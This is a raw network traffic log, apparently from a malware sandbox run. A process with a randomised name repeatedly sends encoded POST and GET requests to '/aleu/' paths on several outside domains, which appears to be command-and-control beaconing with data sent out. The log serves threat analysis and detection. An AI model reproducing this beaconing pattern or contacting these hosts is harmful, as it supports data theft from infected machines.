                                                                                                                                                                                                        Data Ascii: jn4lNb=yk3RZmdKeyh6WRRXgEjSYwvzNN3QlPh7lpd/3981yqzvNvD2Ik3p4ZyABlah0mIj09tV0RDppg6mzHaj4B3y4plOu+1MaIfhfHpgB+tHpJa332nFwsXzHiuQSpD0AXmTrSEYcbJrDkHbBjc5QnfbtU3PfgjTmI0CzbCrx7u35ePQKWONm3+u0LC847MRab9RQA==
May 8, 2024 18:22:55.957185984 CEST | 1289 | IN | HTTP/1.1 530
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:55 GMT
                                                                                                                                                                                                        Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: 8080
                                                                                                                                                                                                        Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
May 8, 2024 18:22:55.957273006 CEST | 1289 | IN | Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
May 8, 2024 18:22:55.957485914 CEST | 1289 | IN | Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
May 8, 2024 18:22:55.957500935 CEST | 454 | IN | Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49770 | 103.93.125.69 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:58.490015984 CEST | 741 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.83634.cn
                                                                                                                                                                                                        Origin: http://www.83634.cn
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.83634.cn/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=yk3RZmdKeyh6EABXsHLSQwvwBt3Qvvh/lpR/3+xyyfrvUK/2PmPp/ZyAKFbrwmJt09hd0QPppkamzGKj5yft45lIne1OeIfhfHpgB/cspJy33m7FiZ6lEiuXFZD0RHmtrSFPcaVBDm/bBis5Q0HYjk2ECwiYptRX+7LW66Cx58HLCwfX3Gf5mLmPl8FlXYAYLBY1JO7KgQUZgKe5ggUoUck=
May 8, 2024 18:22:58.833821058 CEST | 1289 | IN | HTTP/1.1 530
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:58 GMT
                                                                                                                                                                                                        Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: 8080
                                                                                                                                                                                                        Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
May 8, 2024 18:22:58.833906889 CEST | 1289 | IN | Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
May 8, 2024 18:22:58.834079027 CEST | 1289 | IN | Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
May 8, 2024 18:22:58.834095001 CEST | 454 | IN | Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49771 | 103.93.125.69 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:23:01.367810011 CEST | 10823 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.83634.cn
                                                                                                                                                                                                        Origin: http://www.83634.cn
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.83634.cn/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Timestamp: May 8, 2024 18:23:01.713627100 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 530
Date: Wed, 08 May 2024 16:23:01 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Server: 8080


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49772 | Destination IP: 103.93.125.69 | Destination Port: 80 | PID: 4500 | Process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe

Timestamp: May 8, 2024 18:23:04.241189957 CEST | Bytes transferred: 473 | Direction: OUT | Data:
GET /aleu/?jn4lNb=/mfxaTJBOgt3JDZn0BatbUHTEszIrcd1tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEuNl9oe0KYtPyQihSGvBT9JqjuFq9ou3hQwM=&jvudu=jXz4lVThP2GL4N HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.83634.cn
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

Timestamp: May 8, 2024 18:23:04.584686995 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 530
Date: Wed, 08 May 2024 16:23:04 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Server: 8080


Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 49773 | Destination IP: 3.73.27.108 | Destination Port: 80 | PID: 4500 | Process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe

Timestamp: May 8, 2024 18:23:19.606301069 CEST | Bytes transferred: 757 | Direction: OUT | Data:
POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.valentinaetommaso.it
Origin: http://www.valentinaetommaso.it
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Referer: http://www.valentinaetommaso.it/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Timestamp: May 8, 2024 18:23:19.977943897 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 08 May 2024 16:23:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l8olb7ovn3cj4jo296okddhtgs; path=/; domain=valentinaetommaso.it; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip
                                                                                                                                                                                                        Data Ascii: l{cI<W%Y"v_,kna[{6W0EjulN#1OJq<jlC=``]hw) 8dPRG=p$z8kO<0WUN$=t^#dqs% :oq6xwUJA-UpIf:KhM6*T_
                                                                                                                                                                                                        May 8, 2024 18:23:19.978137016 CEST1289INData Raw: 38 93 3f 4b e7 d8 2c 61 26 cd e6 0d 6e 56 14 20 60 74 7d 77 fc 32 5f 2d 02 4e f8 d5 69 1b 6a f1 c6 8f 8b 7c 17 4b a6 65 6d dc 71 b0 be 01 0e 22 fc f1 59 64 11 ef cc ce 50 3b d6 fe 1d 6e 7f c5 31 2f e6 67 e6 43 3f 7b 72 8a ef 2d 78 7a 76 fa 2a 73
                                                                                                                                                                                                        Data Ascii: 8?K,a&nV `t}w2_-Nij|Kemq"YdP;n1/gC?{r-xzv*s3LIF:\+S{w=@{l9yjlK^|Sh78td(l/|%H})0fZZP}N?V-AfQ`@P
                                                                                                                                                                                                        May 8, 2024 18:23:20.292618990 CEST1289INData Raw: b7 54 ff b5 bc 5d df 02 3e d7 79 da c3 d5 1d d2 08 5f 5d 32 ed e3 22 00 1e c1 58 c8 5d b2 12 92 40 51 4d 7a 73 ce a5 9a 73 cc 6a 0a 4f 04 ad 3f 04 e5 14 57 ee dd 0b 03 e6 f5 4d 4f 22 c5 e4 36 99 15 aa c2 04 ba c1 28 10 49 26 e5 39 61 31 f2 fc b5
                                                                                                                                                                                                        Data Ascii: T]>y_]2"X]@QMzssjO?WMO"6(I&9a1FSBFy<]b=JK9S!L rNlK[f3eN-4El'cA)"+I!U9~)#qjy8PE/8f)1["zb5yVEnzy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49774 | 3.73.27.108 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:23:22.451828003 CEST | 777 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.valentinaetommaso.it
Origin: http://www.valentinaetommaso.it
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Referer: http://www.valentinaetommaso.it/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:23:22.864010096 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 08 May 2024 16:23:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hqf05dav11336ugatuqh0ulgaq; path=/; domain=valentinaetommaso.it; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49775 | 3.73.27.108 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:23:25.293934107 CEST | 10859 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.valentinaetommaso.it
Origin: http://www.valentinaetommaso.it
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
Cache-Control: max-age=0
Connection: close
Referer: http://www.valentinaetommaso.it/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:23:25.649450064 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 08 May 2024 16:23:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gbci7dr4gbuvpitvmsd5psuv9t; path=/; domain=valentinaetommaso.it; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip
                                                                                                                                                                                                        Data Ascii: 63dp|qP-bBK2VtFlD #RtlQe2|aR~ wH>ue@jEXn_>}G"Oii+[o3&;C@b_lX KUAd?8}eR[8Vkk?}0)[$cbLAc&TObq
                                                                                                                                                                                                        May 8, 2024 18:23:25.649763107 CEST1289INData Raw: ce ae ce 5e be 38 7e be 4d ed cb 67 67 17 17 e8 b0 77 f2 f2 d2 80 06 c2 88 c7 ff 0d eb ab c7 c8 0e 61 c3 e4 9c d2 84 42 6e c1 e8 1b 83 43 a8 de 63 1b 05 0b cf bf cd de cb e8 7a a9 f7 b1 17 44 ca aa 39 2c d5 24 80 7c 81 04 95 5b cc e7 80 cb 1c b1
                                                                                                                                                                                                        Data Ascii: ^8~MggwaBnCczD9,$|[N:W}1/*om^#lG_=Gsu~[y[Yv~#mEZ}r#C?y`c[_{kFO4ATJHlSWJ$z7I/iRoo5x[
                                                                                                                                                                                                        May 8, 2024 18:23:25.649785995 CEST1289INData Raw: e1 c4 7a cf 5c 7d 88 f1 a5 f7 7a 9c 3d 45 75 6e 77 00 51 ba 38 86 6f f8 16 16 62 2e a4 46 57 9e 4c 95 a2 dc e8 78 90 70 e2 0c a1 99 cb 4d 26 ef 63 aa ef 4a 4f 8e af 4e 7b 57 67 e7 a7 fc 80 9b 8c de 83 84 df 0e dc 6f a7 ee b7 7f 77 be 7d 76 f8 ed
                                                                                                                                                                                                        Data Ascii: z\}z=EunwQ8ob.FWLxpM&cJON{Wgow}v9cKvvv?!g7;IW{PRW&ywgnn7);Ue>fP^3J/'_:}qY?zi4..>n8p|
                                                                                                                                                                                                        May 8, 2024 18:23:25.649801970 CEST1289INData Raw: 3e bc 18 a6 9a 07 91 87 6e 16 13 6f 9e 11 f9 e1 f1 73 dc 70 27 d0 53 62 48 71 df a8 b3 69 90 68 4a 8e 63 9a 0d 6f 10 4f 43 1f e1 5c e8 df 39 ce de e6 23 45 34 18 a2 b8 30 50 5c 59 ec 8d 64 f8 98 ac 10 26 19 e8 07 8b 87 37 e0 39 c7 b8 0e 47 46 8d
                                                                                                                                                                                                        Data Ascii: >nosp'SbHqihJcoOC\9#E40P\Yd&79GFO,j)R6ux9\(/)S,]1Pg8qj%y#lPZ*D_"!9n^h$7w{kx~4gj@:*KB-\sM+^ 2(|X
                                                                                                                                                                                                        May 8, 2024 18:23:25.649816036 CEST1289INData Raw: 82 6c 7b 0a 63 49 13 1e a1 f3 3c bf 57 a7 f2 17 b0 82 fe 01 dc f0 25 59 22 76 5f 2c e2 6b f8 6e 61 88 dc 5b 7b 36 c7 57 fe 30 45 04 6a 19 75 99 c7 85 8c 1a 6c 01 ad 4e e0 23 31 07 4f 4a be c3 ac f5 83 71 3c c1 96 1c 6a 6c 18 9f eb 43 89 c4 cd 8e
                                                                                                                                                                                                        Data Ascii: l{cI<W%Y"v_,kna[{6W0EjulN#1OJq<jlC=``]hw) 8dPRG=p$z8kO<0WUN$=t^#dqs% :oq6xwUJA-UpIf:KhM6*T_
                                                                                                                                                                                                        May 8, 2024 18:23:25.649837971 CEST1289INData Raw: 38 93 3f 4b e7 d8 2c 61 26 cd e6 0d 6e 56 14 20 60 74 7d 77 fc 32 5f 2d 02 4e f8 d5 69 1b 6a f1 c6 8f 8b 7c 17 4b a6 65 6d dc 71 b0 be 01 0e 22 fc f1 59 64 11 ef cc ce 50 3b d6 fe 1d 6e 7f c5 31 2f e6 67 e6 43 3f 7b 72 8a ef 2d 78 7a 76 fa 2a 73
                                                                                                                                                                                                        Data Ascii: 8?K,a&nV `t}w2_-Nij|Kemq"YdP;n1/gC?{r-xzv*s3LIF:\+S{w=@{l9yjlK^|Sh78td(l/|%H})0fZZP}N?V-AfQ`@P
                                                                                                                                                                                                        May 8, 2024 18:23:25.960336924 CEST1289INData Raw: b7 54 ff b5 bc 5d df 02 3e d7 79 da c3 d5 1d d2 08 5f 5d 32 ed e3 22 00 1e c1 58 c8 5d b2 12 92 40 51 4d 7a 73 ce a5 9a 73 cc 6a 0a 4f 04 ad 3f 04 e5 14 57 ee dd 0b 03 e6 f5 4d 4f 22 c5 e4 36 99 15 aa c2 04 ba c1 28 10 49 26 e5 39 61 31 f2 fc b5
                                                                                                                                                                                                        Data Ascii: T]>y_]2"X]@QMzssjO?WMO"6(I&9a1FSBFy<]b=JK9S!L rNlK[f3eN-4El'cA)"+I!U9~)#qjy8PE/8f)1["zb5yVEnzy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49776 | 3.73.27.108 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:23:28.557718992 CEST | 485 | OUT | GET /aleu/?jn4lNb=qJYbYwaLgLDJAMSEQ5QgE4656+lZvARVMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjUavOuE9Ld2m4gF80zlDT2iLkYInMKGRZjmA=&jvudu=jXz4lVThP2GL4N HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.valentinaetommaso.it
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:23:28.927701950 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 08 May 2024 16:23:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ap19f1kakkqqdq1kfms236rbot; path=/; domain=valentinaetommaso.it; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49777 | 91.195.240.19 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:23:44.751929998 CEST | 736 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.solesense.pro
Origin: http://www.solesense.pro
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Referer: http://www.solesense.pro/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 68 4d 36 50 69 42 77 36 4c 49 71 57 48 6e 55 36 70 51 75 61 68 4a 4b 33 42 49 46 6a 77 77 41 56 72 72 72 52 49 2b 6b 71 66 6e 75 63 36 51 76 51 4b 58 4e 43 67 54 4b 70 70 69 53 47 75 45 39 4e 6c 36 61 72 46 55 47 55 53 45 51 52 52 65 4e 4f 54 54 63 77 62 39 37 4f 78 6a 6b 77 62 39 7a 41 74 58 6f 50 71 59 63 66 51 70 79 67 4d 58 62 31 70 77 69 54 57 50 55 57 71 67 46 61 75 4f 33 52 78 6a 31 34 6a 4a 38 62 2b 32 39 38 54 61 31 59 36 58 75 64 6d 77 55 61 44 4d 76 71 6d 56 78 4b 68 50 64 56 38 54 78 74 77 36 62 54 55 75 6c 68 39 2b 53 6f 35 41 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=IuMe+iFtDZEnhM6PiBw6LIqWHnU6pQuahJK3BIFjwwAVrrrRI+kqfnuc6QvQKXNCgTKppiSGuE9Nl6arFUGUSEQRReNOTTcwb97Oxjkwb9zAtXoPqYcfQpygMXb1pwiTWPUWqgFauO3Rxj14jJ8b+298Ta1Y6XudmwUaDMvqmVxKhPdV8Txtw6bTUulh9+So5A==
May 8, 2024 18:23:45.063353062 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49778 | 91.195.240.19 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:23:47.599287033 CEST | 756 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.solesense.pro
Origin: http://www.solesense.pro
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDkVqL7RJ6QqKnucywubUnNJgTGbpj+GuHBNl6KrGjqXSUQTa+NMezcwb97OxnIab9bAtG4Po9oYdJyhLXb14AiXWPUkqigPuNPRxmR4t9oUlG96d60X0ET/jCJOEfzVuVp0kJMPtiQ6i6/gJpsVw9vhiFcoh5b2ni7tB0g1w1Lxotc=
Timestamp: May 8, 2024 18:23:47.912966013 CEST, Bytes transferred: 208, Direction: IN, Data:
HTTP/1.1 403 Forbidden
                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 35
Source IP: 192.168.2.4
Source Port: 49779
Destination IP: 91.195.240.19
Destination Port: 80
PID: 4500
Process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp: May 8, 2024 18:23:50.446114063 CEST, Bytes transferred: 10838, Direction: OUT, Data:
POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.solesense.pro
                                                                                                                                                                                                        Origin: http://www.solesense.pro
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Timestamp: May 8, 2024 18:23:50.757091999 CEST, Bytes transferred: 208, Direction: IN, Data:
HTTP/1.1 403 Forbidden
                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 36
Source IP: 192.168.2.4
Source Port: 49780
Destination IP: 91.195.240.19
Destination Port: 80
PID: 4500
Process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp: May 8, 2024 18:23:53.287883043 CEST, Bytes transferred: 478, Direction: OUT, Data:
GET /aleu/?jn4lNb=Fsk+9Ugrf6MFs9mf9XEpMImSOUY5iiqQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUGzAeffoJWz8ACYHJmD8/KtCE1mdCsvc/NZo=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.solesense.pro
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Timestamp: May 8, 2024 18:23:53.599443913 CEST, Bytes transferred: 208, Direction: IN, Data:
HTTP/1.1 403 Forbidden
